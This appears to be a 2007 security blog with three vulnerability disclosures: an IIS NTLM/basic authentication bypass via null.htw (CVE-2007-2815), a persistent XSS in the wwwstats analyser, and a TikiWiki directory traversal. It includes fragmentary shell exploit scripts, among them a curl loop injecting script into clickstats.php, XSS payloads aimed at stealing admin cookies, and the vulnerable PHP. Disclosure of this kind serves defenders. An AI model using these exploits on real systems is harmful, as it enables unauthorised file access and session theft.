domingo, diciembre 30, 2007

Microsoft IIS ntlm and basic auth bypass

You can protect your web contents by adding ntfs acls, then you will be secure.
But you can protect your web contents by the Internet Information basic/ntlm autentication, then this will be bypassed with null.htw object.

Both authentications seem be the same, but really the object null.htw let users get any file in web directory, only if it is protected by the filesystem, will be secure.

In the exploit you can see how to use the null.htw object.

# sha0[at]
# Based on my adv:
# (CVE-2007-2815)

if [ $# != 2 ]
printf "USAGE:\t\t$0 \nExample:\t$0 /en/us/default.aspx\n\n";
exit 0

lynx -dump $evil

Is hard to believe.

jueves, diciembre 27, 2007

wwwstats vulnerable to Persistent XSS

wwwstats is a very widely used Web traffic analyser, that registers in a database the user agents, referers, downloads, etc ..

I discovered a way to inject HTML and JavaScript to the database by calling directly the clickstats.php code. This would mean mass defacing, steal admin sessions, web redirecting, WSS Worms, google-bombing and google-priorizing.

To bypass the first 'if', is necessary to fill the HTTP Referer field with something, and inject the link to the database by the link get parameter.

An attacker can inject using the link parameter or the useragent field a script which will steal admin's cookies, or make a deface, or anything else...

If magic quotes are configured at php.ini, there is no problem, in javascript \'test\' is interpreted as 'test'.

Controlling the iterations number, is possible to do the injection in the ranking position you want:

while [ 1 ]; do
'<script>XXXX</scrip>' -e
'xxx'; done

Also is possible to attack by user agent: -A 'attack'

A payload can be:

<script scr=''></script>

#jolmos (at) isecauditors (dot) com

if [ $# -ne 4 ]
echo "Usage: $0
<html or javascript to inject in downloads> "
echo "Example: $0
<script>window.location=""</script> 100"

echo 'Attacking, wait a moment'
for i in `seq 1 $3`; do curl "$1/clickstats.php?link=$2" -e 'attack'; done

External links:

Tikiwiki CMS Trasversal Directory

Tikiwiki is a full featured CMS, massively used in the world.
(search on google: tiki-index.php)

18/12/2007 I was auditing the code and found a dangerous vulnerability, that lets a malicious user get any file in the system via web (with the apache user permissions)

Mose and the coders quickly solve the problem and release the 1.9.9 version.
Free software is more secure every day thanks to the quick response of the community.

Exploit explanation:

Why this 1234 stuff?
well, the last 4 bytes of movie parameter, are erased, and then an .xml extension was appended.
Then tiki-listmovies will erase the "1234" and the null byte will ignore the extension.

Only is possible get the first 1000 bytes of the file.

The vulnerable code:

if(isset($_GET["movie"])) {
$movie = $_GET["movie"];

if ($movie) {
// Initialize movie size
$confFile = 'tikimovies/'.substr($movie,0,-4).".xml";

//trc('confFile', $confFile);
$fh = @fopen($confFile,'r');
$config = @fread($fh, 1000);
if (isset($config) && $config <>'') {
$width =
preg_replace("/^.*?(.*?)<\/MovieWidth>.*$/ms", "$1", $config);
$height =
preg_replace("/^.*?(.*?)<\/MovieHeight>.*$/ms", "$1",